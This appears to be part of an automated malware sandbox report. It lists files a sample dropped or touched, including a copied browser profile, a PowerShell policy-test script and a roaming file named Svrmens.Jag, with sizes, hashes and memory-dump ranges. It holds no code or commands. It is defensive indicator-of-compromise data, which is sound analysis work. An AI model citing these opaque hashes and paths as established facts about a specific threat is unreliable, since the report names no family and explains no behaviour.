ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
265B

MD5
77d869e8edaec9572a1d3e4592bf997e

SHA1
281af20bdb0488bf634781566cbfde4f9e1469a2

SHA256
4cb2f062facb331dba14776882f112adf9cb4d735ae4c399635c171fae86f075

SHA512
9943f787b872eecb74c0ff270247ecaf29796e421c29a75f4b75762500bdcbb21649e2b7e23255403b12b691b3115cb35a59e0db4dbd4cb5c0eadd1b82d9fb93

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
293B

MD5
a4fcbfc446dbbc2aa234134b91846304

SHA1
eafc41dbb32f8378e2f871d6a2298e269eed5fb0

SHA256
4cc32cf02209dee69c6c20bdccce35e566fa1242932211f4d26776f18b2ef56a

SHA512
d8f56365233a2c01247d56f8e8146de30bdbe344eda744e9cda40d3ddcd9db3b8c36d888609ceaa53396079458dd30a5debbcd98314a24c54c5401e916a1ab56

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
267B

MD5
77b88fa97135ee87057a151ffa3f4698

SHA1
89ed665a354f74b07af17e4edd6f5fd76df9a024

SHA256
6241c1bca1fc794e78216b86cb361c941e79836d82b937061bdb7c187979ce3d

SHA512
88c12302c1b7ed002fb9ad67716dc0672c69da691e81557a6a23fae76d88be4cd13e5195fc952dcd8c2d9cca4ae964c77fbb6a824ffc0990c3b31d58a516b555

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
fe1210db72df90d5feb1fd32582cc528

SHA1
130b154e4e1bcd5627ac337699366cb1e3b1e700

SHA256
9442e1f23bfba6dd7d766f0dc21acd991fcf3823e9cc1916d7654927553d6a66

SHA512
970a2a3320f9dfc580e8c6e5a9167e2389ec1e435a6e084b3cad77fd97128b6ae59b3ef0f091837f8afa6a68a61c10ed6fd3210758000aeafd27b81b43f6e855

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
8e7775eddfe6e0cf7aea55cd21c7d7a8

SHA1
c67226249d3e508af6707bfbc8ec0aa17b7e417a

SHA256
9b6dfbdea3fb32881fa6977c15791ba2cf94124f0da6a805b30253c294156f5e

SHA512
69dcab09e65f71258389f70ceb2c5c38d6ec64443dfabc302d95398afe2378008d5291008d7586a10eb02525182b31ddee96cd29c0d77011de774df0daa003b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
c3fd4f812f15654d496f46aeced3c78b

SHA1
86d7262c5996851ecb3979f979a6688bb367b4cd

SHA256
b6f1492844490ef77ef2765ac0e3dc5ebdf0d1cd559a3539ccb8eb95842e2cf2

SHA512
a797271b8c3c599cd49d7a02cbcfde3bff01f0f8d085fd65ad7ad670d775e9e9d194434ee21965ea80ecb3a5899cd87877795d575b00ecd4d097f1280273389c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
263B

MD5
f258ccf558dd72a47769a5c841bafd73

SHA1
c2b9dc901d82dbc9b7cc73f96b12beb245461dc9

SHA256
ee09009abddc37e45f54a51ac8be4f34029aa2fa9cbfcb05652ad523a8338097

SHA512
5444917f399bbe08b16761c682875d8a71764e44e046977953229c470b2f039d6a353493bcddea50b27ae07a57b12406cd46e1d817db9b122492faed560b43a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
0e68292311b51408f0dc51195da1789c

SHA1
c9a88843737e53b0f864a6267f380355d8f3f99f

SHA256
094c4ec132c2ead595a67e1971c66e2276bd2913334c4cc149edc1f938b86d22

SHA512
0a41e88adaaac948b62695eab8d6b13f08e1eff08d05016dc0dc803c27ed2344de34cd104cdaa54e605dd60a2ea8ad1dcbc238c78b0fc6e8176774308ddf210c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
281B

MD5
0d53edbc93dfd4c1b4c12e825a8353f6

SHA1
e69087d0ba2f62f7b32e4d6bf9d8ca790c92ff94

SHA256
cf4aa0f5996ea8ba6ccd9651672db55a77f7ae53b3f1df7fd840404f4ba6b647

SHA512
679b1181a7a6647f5862beea8927744abe96554220f2029e75e9f9b9d30b8063ae072f25165c549abed0d3277d0fde1e0872c4bb64e8d707cb641835717bffbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
8KB

MD5
44ba652096a17a0152db06ea689d6295

SHA1
2b1f36bbd3f5613f1cb3860ce45263c786045dce

SHA256
0c866e4e13ad8b10e02ee833606baa44ed7cba959239b41df367e05d1a047243

SHA512
176bd14135e45c5f7f29fdf0f27e601d77a097bb695369285494b3ed7339148cfd0afd923d7bda56eae4610a20fc281027b098f1cd71932ad767581de0df6de7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
116KB

MD5
a4bb6adc6863d913f1b0f63b0ccac6a3

SHA1
2cd140e7871500f05725565035e7a07a7a229fbd

SHA256
c8ed9e7f504bcece2d2f745ae4c1ce71bd24b90e17f755331b00a7813ea936d6

SHA512
caca9769fe72c9494d3002509a91b790c27966ebcd8af8e3e0d6b44faef94f2903eee8c09d6a57f0fd184a02a5a0a117f148bf6890e42f3fd646a7444d0821ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu4zfi5f.ryj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kqmeldaalobziizplruohgwfmnzdudc

Filesize
4KB

MD5
75379d3dcbcea6a69bc75b884816dd40

SHA1
7e073a03c3bdbbc60375ddbe56bba211c3d412a6

SHA256
cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

SHA512
710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

Download Submit
C:\Users\Admin\AppData\Roaming\Svrmens.Jag

Filesize
472KB

MD5
446422fa7fea111877f8479983047645

SHA1
809d50b29798cc9fe183379389d98583d1ca71c4

SHA256
0cf981f2f27a017651d067e0864eb90e84b6b0dd02113e1aa82b19fd0337b4ee

SHA512
6060d17ba683b83060af3e01c4cce6bb99d20e9700b134bdf3bc11b884bdb26bb7120b95180acdc99f1cae956d7fdd9cc3d3e291648c4df522f11d58e4db6bef

Download Submit
memory/1960-83-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1960-84-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1960-86-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2956-79-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2956-85-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2956-82-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2956-80-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3460-61-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/3460-67-0x000000001FD10000-0x000000001FD44000-memory.dmp

Filesize
208KB

Download
memory/3460-201-0x0000000020730000-0x0000000020749000-memory.dmp

Filesize
100KB

Download
memory/3460-198-0x0000000020730000-0x0000000020749000-memory.dmp

Filesize
100KB

Download
memory/3460-202-0x0000000020730000-0x0000000020749000-memory.dmp

Filesize
100KB

Download
memory/3460-70-0x000000001FD10000-0x000000001FD44000-memory.dmp

Filesize
208KB

Download
memory/3460-71-0x000000001FD10000-0x000000001FD44000-memory.dmp

Filesize
208KB

Download
memory/4240-91-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4240-90-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4240-92-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4644-5-0x00007FF989860000-0x00007FF98A321000-memory.dmp

Filesize
10.8MB

Download
memory/4644-4-0x00007FF989863000-0x00007FF989865000-memory.dmp

Filesize
8KB

Download
memory/4644-15-0x000001C9CC7C0000-0x000001C9CC7E2000-memory.dmp

Filesize
136KB

Download
memory/4644-17-0x00007FF989863000-0x00007FF989865000-memory.dmp

Filesize
8KB

Download
memory/4644-19-0x00007FF989860000-0x00007FF98A321000-memory.dmp

Filesize
10.8MB

Download
memory/4644-20-0x00007FF989860000-0x00007FF98A321000-memory.dmp

Filesize
10.8MB

Download
memory/4644-23-0x00007FF989860000-0x00007FF98A321000-memory.dmp

Filesize
10.8MB

Download
memory/4972-38-0x0000000006080000-0x00000000063D4000-memory.dmp

Filesize
3.3MB

Download
memory/4972-41-0x0000000006730000-0x000000000677C000-memory.dmp

Filesize
304KB

Download
memory/4972-28-0x0000000005F90000-0x0000000005FF6000-memory.dmp

Filesize
408KB

Download
memory/4972-27-0x0000000005F20000-0x0000000005F86000-memory.dmp

Filesize
408KB

Download
memory/4972-26-0x0000000005820000-0x0000000005842000-memory.dmp

Filesize
136KB

Download
memory/4972-25-0x00000000058F0000-0x0000000005F18000-memory.dmp

Filesize
6.2MB

Download
memory/4972-24-0x0000000002DF0000-0x0000000002E26000-memory.dmp

Filesize
216KB

Download
memory/4972-40-0x00000000066F0000-0x000000000670E000-memory.dmp

Filesize
120KB

Download
memory/4972-42-0x0000000007F80000-0x00000000085FA000-memory.dmp

Filesize
6.5MB

Download
memory/4972-43-0x0000000006C90000-0x0000000006CAA000-memory.dmp

Filesize
104KB

Download
memory/4972-44-0x00000000079B0000-0x0000000007A46000-memory.dmp

Filesize
600KB

Download
memory/4972-45-0x0000000007940000-0x0000000007962000-memory.dmp

Filesize
136KB

Download
memory/4972-46-0x0000000008BB0000-0x0000000009154000-memory.dmp

Filesize
5.6MB

Download
memory/4972-48-0x0000000009160000-0x000000000AAD8000-memory.dmp

Filesize
25.5MB

Download